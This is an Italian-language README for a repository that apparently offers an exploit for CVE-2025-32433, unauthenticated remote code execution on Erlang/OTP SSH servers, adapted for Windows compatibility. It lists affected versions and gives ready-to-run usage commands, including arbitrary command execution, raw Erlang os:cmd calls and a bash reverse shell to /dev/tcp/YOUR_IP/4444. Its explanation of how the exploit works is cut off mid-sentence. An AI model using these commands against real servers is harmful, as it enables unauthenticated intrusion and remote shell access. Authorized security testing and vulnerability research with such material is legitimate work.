
Basato sulla versione originale:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Sostituisci il segno di spunta Unicode con un carattere ASCII per la compatibilità con Windows
Esecuzione remota di codice non autenticata su SSH Erlang/OTP
Questo repository contiene un exploit per CVE-2025-32433, una vulnerabilità critica di esecuzione remota di codice non autenticata nel server SSH Erlang/OTP.
Caratteristiche principali:
CVE ID: CVE-2025-32433
Gravità: Critica
Impatto: Esecuzione remota di codice non autenticata
La vulnerabilità consente agli attaccanti di eseguire comandi di sistema arbitrari sui server SSH Erlang/OTP senza autenticazione, inviando messaggi di protocollo SSH appositamente modificati.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Target IP address (default: 127.0.0.1)
-p, --port Target port (default: 2222)
-c, --command System command to execute
-e, --erlang Raw Erlang code to execute
Questa versione corregge il problema di codifica presente nell'exploit originale:
Problema: L'exploit originale utilizzava il carattere Unicode di spunta (✓, U+2713) che causa errori di codifica GBK su Windows:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
Soluzione: Sostituito il carattere Unicode con il carattere ASCII standard + per la compatibilità multipiattaforma.
L'exploit funziona nel seguente modo:
os:cmd()Questo exploit è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. Usalo in modo responsabile e solo su sistemi su cui hai esplicita autorizzazione a effettuare test.
Licenza MIT
Modificato per la compatibilità con Windows da chuzouX